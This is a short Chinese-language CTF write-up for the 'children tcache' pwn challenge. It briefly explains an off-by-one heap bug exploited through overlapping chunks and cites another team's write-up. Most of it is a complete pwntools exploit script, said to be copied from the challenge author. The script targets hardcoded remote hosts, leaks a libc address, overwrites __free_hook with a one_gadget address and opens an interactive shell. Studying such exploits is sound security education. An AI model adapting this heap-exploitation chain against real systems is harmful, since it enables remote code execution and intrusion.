children tcache¶
分析¶
仍然是个off-by-one漏洞,但跟baby tcache不一样的地方,有个打印内存内容的函数。
核心还是构造overlapping chunks,具体见利用代码,直接抄的出题人的。
脚本¶
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * host = "10.211.55.19" #host = "52.68.236.186" #port = 56746 host = "54.178.132.125" port = 8763 r = remote(host,port) def allocate(size,data): r.recvuntil(":") r.sendline("1") r.recvuntil("e:") r.sendline(str(size)) r.recvuntil("a:") r.send(data) def show(idx): r.recvuntil(":") r.sendline("2") r.recvuntil("x:") r.sendline(str(idx)) def free(idx): r.recvuntil(":") r.sendline("3") r.recvuntil("x:") r.sendline(str(idx)) for i in range(6): allocate(0x80,"a") allocate(0x38,"a") #6 allocate(0x4e0+0x490,"b") #7 allocate(0x410,"c") #8 allocate(0x80,"d") #9 free(7) free(6) allocate(0x68,"c"*0x68) #6 allocate(0x80,"d"*0x78) #7 free(5) allocate(0x60,"da") #5 for i in range(5) : free(i) free(9) free(7) free(8) allocate(0x90,"ccc") allocate(0x7f0-0xa0,"d") allocate(0x50,"d") free(5) allocate(0x30,"a") allocate(0x60,"a") allocate(0x20,"gg") show(4) libc = u64(r.recvuntil("\n")[:-1].ljust(8,"\x00")) - 0x3ebca0 print hex(libc) free_hook = libc + 0x3ed8e8 free(0) allocate(0xa0,"b"*0x70 + p64(free_hook)) allocate(0x90,"b") magic = libc +0x4f322 allocate(0x90,p64(magic)) free(5) r.interactive()
参考¶
p4战队的解法,利用了tcache块超出7个以后,会掉到unsortbin的特性: * http://eternal.red/2018/children_tcache-writeup-and-tcache-overview/